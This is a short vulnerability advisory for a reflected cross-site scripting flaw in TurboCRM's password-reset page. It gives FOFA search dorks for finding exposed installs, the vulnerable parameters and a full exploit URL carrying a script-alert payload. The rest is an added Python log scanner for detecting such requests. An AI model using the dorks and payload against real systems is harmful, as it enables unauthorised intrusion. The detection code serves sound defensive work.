### TurboCRM Allows XSS (Cross-Site Scripting)

### Dork

- https://fofa.so/result?qbase64=YXBwPSLnlKjlj4stVHVyYm9DUk0i
- https://fofa.so/result?qbase64=dGl0bGU9IueUqOWPiy1UdXJib0NSTSI%3D

### Payloads

`">`

## Steps to Reproduce

1. Open the website in a browser.
2. Go to the path `/login/forgetpswd.php?loginsys=1&orgcode={PAYLOADS}&loginname={PAYLOADS}`
3. Press Enter to trigger the alert.

## Example:

`http://IP/login/forgetpswd.php?loginsys=1&orgcode=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&loginname=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E`
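
For defenders, the following added example (not part of the original advisory) scans web access logs for requests to the path above whose `orgcode` or `loginname` value decodes to HTML markup. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

TARGET_PATH = "/login/forgetpswd.php"        # path named in the advisory
WATCHED_PARAMS = ("orgcode", "loginname")    # parameters named in the advisory
# Characters that close an HTML attribute or open/close a tag.
MARKUP = re.compile(r'[<>"]')
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return the watched parameter names whose decoded value contains markup."""
    parts = urlsplit(request_target)
    if parts.path.lower() != TARGET_PATH:
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    for name in WATCHED_PARAMS:
        for value in query.get(name, []):
            # parse_qs decodes once; decode again to catch double encoding.
            if MARKUP.search(value) or MARKUP.search(unquote(value)):
                hits.append(name)
                break
    return hits

def scan_access_log(lines):
    """Yield (line_number, client_ip, params) for each flagged log line."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        params = suspicious_params(match.group(1))
        if params:
            yield number, line.split(" ", 1)[0], params

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /login/forgetpswd.php?loginsys=1&orgcode=ACME&loginname=alice HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /login/forgetpswd.php?loginsys=1&orgcode=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&loginname=bob HTTP/1.1" 200 640',
    '203.0.113.4 - - [01/Jan/2024:10:00:09 +0000] "GET /login/forgetpswd.php?loginsys=1&orgcode=ACME&loginname=%2522%253E HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

A hit only shows that markup was sent to the page; whether it was reflected unescaped has to be confirmed against the response or the application code.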